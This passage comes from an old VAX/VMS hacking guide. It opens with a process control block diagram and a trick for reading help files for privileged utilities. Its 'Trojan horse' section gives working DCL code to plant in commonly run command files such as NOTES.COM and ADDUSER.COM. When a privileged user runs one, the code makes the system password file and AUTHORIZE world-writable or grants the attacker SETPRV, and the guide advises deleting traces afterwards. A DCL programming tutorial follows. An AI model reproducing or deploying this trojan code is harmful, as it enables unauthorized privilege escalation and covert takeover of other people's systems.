        +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pcb$l_sqfl   !               !                !               !:pcb$t_termi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+---------------+                !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pcb$l_sqbl   !               !                +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+---+---+-------+                !               ! :pcb$l_pq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pcb$b_type   !   !   !       ! :pcb$w_size    +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cb$b_pri    +---+---+---+---+                !               ! :pcb$l_efc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pcb$w_mtxcnt !       !   !   ! :pcb$b_astact  +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+-------+---+---+  pcb$b_asten   !               ! :pcb$l_efc2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pcb$l_astqfl !               !                +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+---------------+                !               ! :pcb$l_efc3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pcb$l_astqbl !               !                +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+---------------+                !               ! :pcb$l_p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pcb$l_phypcb !               !                +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+---------------+                !               ! :pcb$l_ph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pcb$l_owner  !               !                +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+---------------+                !               ! :pcb$t_l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pcb$l_wsswp  !               !                !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+---------------+                !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pcb$l_sts    !               !                +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+---------------+                !               ! :pcb$l_ji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pcb$lwtime   !               !                +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+---+---+-------+                !               ! :pcb$q_pr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pcb$b_wefc   !   !   !       ! :pcb$w_state   !              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cb$b_prib   +---+---+-------+                +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pcb$w_tmbu   !       !       ! :pcb$w_aptcnt  !               ! :pcb$l_ar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+-------+-------+                +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pcb$w_ppgcnt !       !       ! :pcb$w_gpgcnt  !               ! :pcb$l_u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+-------+-------+                +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pcb$w_biocnt !       !       ! :pcb$w_astcnt  !               ! :pcb$l_lockqf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+-------+-------+                +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pcb$w_diocnt !       !       ! :pcb$w_biolm   !               ! :pcb$l_lockqb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+-------+-------+                +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pcb$w_prccnt !       !       ! :pcb$w_diolm   !               ! :pcb$l_dlckpr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+-------+-------+                +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: BLOCK 2 is just a continuation of BLOCK 1.  The PCB is the Pro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Control Block which is assigned to each process. It holds all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relevant information for the particular process.  The address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he PCB is shown when you execute the SHOW PROCESS  from SD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 that when you are examining memory you can specify addresses in two way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1) locationA:locationB   -from locationA to location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2) locationA;numbytes    -from locationA to locationA+numby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RTHER HEL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ke I have stressed throughout this file, the best way to learn about VM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use the ONLINE HELP that is available on virtually every VAX.  You may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so noticed that certain programs such as MAIL have self-contained help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not seemingly accessible from the normal HELP.  So how do you get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formation?!  Well, all the extra help files for programs such as MAIL, SDA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HORIZE, etc are all stored in the SYS$HELP directory.  The only problem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they are not in very human readable form.  To get a properly forma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xt output you can use the LIBRARY command.  Here is an example that dumps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help file on SDA into a file called SDA.HLP in your director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library/extract=(*)/output=sys$login:sda sys$help:sda.hl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w to explain this line.  The library program will extract the SDA help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sys$help:sda.hlb) and put it into your login directory (sys$login:sda.hlp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re I have put the (*), you can alternatively put any number of command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may want referenced.  The (*) will dump ALL the commands into the help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example to ONLY get the SHOW command and its qualifiers (for SDA) in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, you may try something lik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library/extract=(show)/output=sys$login:sda_show  sys$help:sda.hl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nce the files generated from this command is standard ASCII, you can r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se help files with the TYPE command, i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type sys$login:sda.hl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ame method can be utilized for any of the other commands to which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rmally do not have access, eg. AUTHORIZE, SDA etc.  This way you can lea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understand the command without necessarily having the privilege of rea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in the first place.  Of course I recommend that you read both the AUTHORIZ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SDA files since they are probably the most useful files in the bunch. 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 a list of the other help files, just d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dir sys$help:*.hl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you can specify any of the listed files in the LIBRARY command. I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eate these files, just make sure you delete them, once you are through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ing them, especially if they are in someone elses ACTIVE accou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OJAN HOR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ts suppose you have done all you can in trying to gain privileges, and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neither come up with a high level account, or any mechanism of boos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privs. Now what? Well the following methods I will describe should be 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net you more privileges but there is one small problem.  These metho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ually involve modifying or creating new files in certain places.  I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manager were to notice such a file, he could simply perform a DIR/OW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would know which account someone was hacking on, and he would no doub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nge the password or kill the account.  Now this is an IF situation. Alth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s a good chance you will get away with it, you still have that risk fac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says that you may very well lose this particular VAX.  So if this i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ly VAX that you have access to, and you are still in the learning proces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't try these techniques.  Once you have learned the operating system w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ough and feel that you can afford to lose the VAX if worst comes to wor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you can proceed with these time honoured technique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k so what is a trojan horse?  Based on the original definitions for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s, a trojan is simply a file that you have someone execute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forms some arbitrary task unbeknownst to the user.  Of course there ar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pical trojan programs that go through the logon sequence and try and proc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/password combinations. This is fine, but what about other methods?  I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e for getting more accounts, some which may be possibly privileged, but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ill aren't guaranteed to get a good account.  So what do you do?!  Well,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ryone should know by now, the easiest way to get more privileges is to g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m to your user via the AUTHORIZE program.  The problem is that on all VAX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YSUAF.DAT file is read/write protected and on some even the AUTHORIZE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self is protected.  The key is to unlock these files, so that they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essed through the WORLD protection field.  The easiest way to do this i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a privileged user unwittingly do the dirty deed for you.  Here I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cribe a few methods of accomplishing such a tas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he key here is to find a COM file that the users often use.  This could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ything from some simple utility to a full featured DCL program such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USER.COM.  What I usually do is search through the system symbols (SH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MBOL *) and logical table (SHOW LOGICAL) for definitions that are execu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a COM files.  Often you will find in the symbol table some weird ut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ke NOTES that everybody executes. Lets assume you have found a prospec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.  The next thing to check is to see if you write access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otry in which this file resides.  If you have READ access also, then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simply put in your TROJAN coding right within the main program (af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ving the original copy somewhere safe).  If you don't have read access,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create a program with the same filename.  Since your program will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higher version number, it will get executed instead of the original progra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you perform your deed and delete the TROJAN and continue on and execu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eal COM file.  Here is an example, which is a fragment of a DCL rout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can easily be changed to fit inside another rout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 pre_prvs=f$setprv("setprv"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 if f$privilege("setprv") then goto f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 @notes.com;5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 fix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 set prot sys$system:sysuaf.dat/prot=(w:rw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 set prot sys$system:authorize.exe/prot=(w:rw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 pre_prvs=f$setprv(pre_prv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 @notes.com;5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is example we have created another file called notes.com;56 in the pro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ory.  Whenever someone types in NOTES this file gets executed instead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original.  When control is passed here, it checks if the user has SETPR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vilege.  If he doesn't, it continues on with the normal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NOTES.COM;55) If the user has the SETPRV privilege, you have the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nge the protection on SYSUAF.DAT and AUTHORIZE.EXE to full World Acc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means that you can now run AUTHORIZE from ANY ACCOUNT no matter how low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is!!!  Is that awesome or what?!   Once the protection has been changed,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erase the notes.com;56 file and no one will ever know anything happene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ilarly if you modified the actual DCL program, then you just copy back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iginal.  Remember its extremely important to tidy up after yourself once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don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Here is another example, which you may want to try. First of course you M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ck for the privileges of the user (just like in the above program),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open/write file sys$scratch:adduaf.tm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write file "$ RUN SYS$SYSTEM:AUTHORIZE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write file "MODIFY NAME/PRIV=SETPRV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close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@sys$scratch:adduaf.tmp/output=sys$scratch:adduaf.d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del sys$scratch:adduaf.*;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little patch in the coding will modify your own users privileges and g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m SETPRV when the superuser executes this routine.  The trick is to hide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in some other program so he doesn't even realize he has done anything!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rse after the routine has been successfully executed, the original co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uld be put back.  There are many places you can put this routine, inclu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USER.COM (if you have write access)!  That would mean, every tim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manager went to add a new user, he would also boost your privs! HaHa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uite ironic eh?!  The farthest thing that he wants to do, and you make him d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without even realizing.  Of course you should use your imagination and p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or a similar routine in a place where it will be quickly executed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nger the code stays around without being execute, the more chance that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be discovered.  An optimum program would be something tha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s/operators execute frequently (eg notes, mail, phone etc)  Other g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ces are the LOGIN.COM and SYLOGIN.COM files.  Just remember to cover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cks once you're done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his is but a brief introduction to Trojans and the like.  You should use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wn imagination to come up with other ways of making the system operat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ccumb to your wishes...heh he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CL PROGRAM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No file would be complete without at least mentioning programming Comm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cedures.  Basically, these are like BAT files from MS-DOS or script fi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UNIX.  They form a rudimentary but powerful language that allows you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uickly create small programs to handle most simple tasks.  This section is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nded to be a a full blown tutorial on programming in DCL, rather its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roduction to what it is all ab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t is quite easy to pick up programming in DCL and the best way to learn i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a look at some of the COM files you will find on the various VAXe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hack on.  By studying these, you can quickly learn the methods on how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fo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ertain routines.  Below I have listed some of the commonly needed routin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programming in DCL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SSING PARAMET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ameters can be passed to DCL programs directly from the shell in seve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ys. Here are a few example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1) @sample 24 2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When you execute this, the values 24 and 25 are passed to the sample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file in the variables p1 and p2 respectively. ie p1=24, p2=2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2) @sample Paul Cram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1=PAUL,  p2=CRAM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3) @sample "Paul Cramer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1=Paul,  p2=Cram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4) name= "Paul Cramer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@sample 'name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is example demonstrates the method of passing predefined variables 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ommand procedure.  In this case,  p1=PAUL,  p2=CRAM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5) name ="""Paul Cramer""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@sample 'name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Note that passing the variable in three double-quotes preserves the ca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1=Paul,  p2=Cram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TING INP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Often it is necessary to get some sort of input from the user when execu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command procedure.  This is performed through the INQUIRE command. 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amples follow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1) INQUIRE variable "prompt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is will display the 'prompt' message and then wait for input.  The st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assed is kept in 'variable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2) INQUIRE/NOPUNC variable "prompt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When you specify /NOPUNC, the prompt will NOT be followed by a colon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pace as is the defaul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3) INQUIRE/LOCAL variable "prompt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NQUIRE/GLOBAL variable "prompt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t should be noted that if you specify /LOCAL, the variable will remain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e local symbol table accessible only by this particular COM file.  If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e other hand, you specify /GLOBAL, the variable is placed in the glob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ymbol table and is made accessible to other fi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4) IF pn .eqs. "" THEN INQUIRE pn "prompt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You can use this method to check if a certain variable (pn in this case)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null or not.  If it is, you can ask for inp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5) READ/PROMPT="prompt" SYS$COMMAND vari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is is another method of getting inp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PLY INPUT FOR A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ten you may need to create a file and get input from some outside sour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gain there are several ways of doing this.  Here I will outline thr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fferent method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DATA      :- CREATE TEST.D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ata line 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ata line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etc et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ERMINAL  :- DEFINE/USER_MODE SYS$INPUT SYS$COMM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REATE TEST.D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A FILE    :- DEFINE/USER_MODE SYS$INPUT TEST.INP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REATE TEST.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PUTTING INFORM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general when outputting information, you should always send it to SYS$OUTP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this does is automatically write to whatever the user has defined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$OUTPUT.  It doesn't matter what type of terminal or whatever it is, but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send it in the correct format.  Some examples follow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1)  WRITE SYS$OUTPUT "literal text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is will print 'literal text' on your termin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2)  WRITE SYS$OUTPUT symbol-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is will print on your terminal whatever value is held in symbol-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3)  WRITE SYS$OUTPUT "literal text ''symbol-name'  literal text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is example shows how you can mix in normal text with a variable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ollow it by more tex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4)  TYPE SYS$INP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is is a sample mess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at is spread out o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everal lin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You would use this method whenever there are more than a few lines of tex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 be prin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RITING TO A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will find that many times when writing a COMmand procedure you will ne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ve certain information to a file.  This can be accomplished with a rout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ilar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EN/WRITE FILE TEST.D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RIT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NQUIRE DATA "Input Data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F DATA .EQS. "" THEN GOTO D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WRITE FILE DA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GOTO WR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CLOSE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will give a quick breakdown of what is going on here.  First you ope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 that you want, including the /WRITE qualifier followed by the filen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sample program simply inputs data, writes each line to a file and exi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the user hits RETURN on a blank line.  Simple but effective text inp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cil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DING A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ce you have written a file, you will often need to read that information b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again. For example you may keep track of when the person last ran the fi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ch time the file is run, you would save the time/date to a file, and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d it back in, and display it on each subsequent execution.  The sam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ucture of a read routine would b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EN/READ FILE TEST.D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READ/END_OF_FILE=DONE FILE DA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GOTO R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CLOSE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routine would loop and keep reading a file, one line at a time, sto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information in DATA until the end of file is detec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DITIONAL LOG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 programming language would be complete without the ability to perform logi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though it is very simplistic, it provides just enough power to handle m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ple conditions.  Some example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1) IF p1 .EQS. "" THEN GOTO DEFAUL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n this example the procedure checks to see if the parameter passed in p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s NULL or not.  If it is then the program branches to DEFAUL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2) IF p1 .NES. 10 THEN GOTO end_lab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END_LABEL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Here we see that if p1 does not equal 10 then the program branche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END_LABEL, otherwise it continu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3) COUNT =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LOOP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UNT=COUNT+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F COUNT .LE. 10 THEN GOTO LOO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EX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is example shows how to establish a loop in a command procedure, u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e symbol COUNT and an IF statement.  The IF statement checks the val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of COUNT and performs an EXIT when the value is greater than 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RESS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 data operations and comparisons are listed below in order of precede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ginning with the highest (operations and comparisons grouped together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ble have the same precedence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+--------+------------------------------------------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Operator                    Descri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+--------+------------------------------------------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+     Indicates a positive nu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-     Indicates a negative nu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+--------+------------------------------------------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*     Multiplies two numb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/     Divides two numb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+--------+------------------------------------------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+     (1) Adds two numb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(2) Concatenates two character strin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-     (1) Subtracts two numb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(2) Subtracts two character strin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+--------+---------------------------------------------------------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.EQS.   Tests if two character strings are equ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.GES.   Tests if first character string is greater than or equ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.GTS.   Tests if first character string is greater th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.LES.   Tests if first character string is less than or equ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.LTS.   Tests if first character string is less th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.NES.   Tests if two character strings are not equ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.EQ.    Tests if two numbers are equ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.GE.    Tests if first number is greater than or equal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.GT.    Tests if first nu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9:01:00Z</dcterms:created>
  <dc:creator>scott greenland</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>scott greenland</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2001-01-26T19:01:00Z</dcterms:modified>
  <cp:revision>2</cp:revision>
  <dc:subject/>
  <dc:title>+----------------------------------------------------------------------------+</dc:title>
</cp:coreProperties>
</file>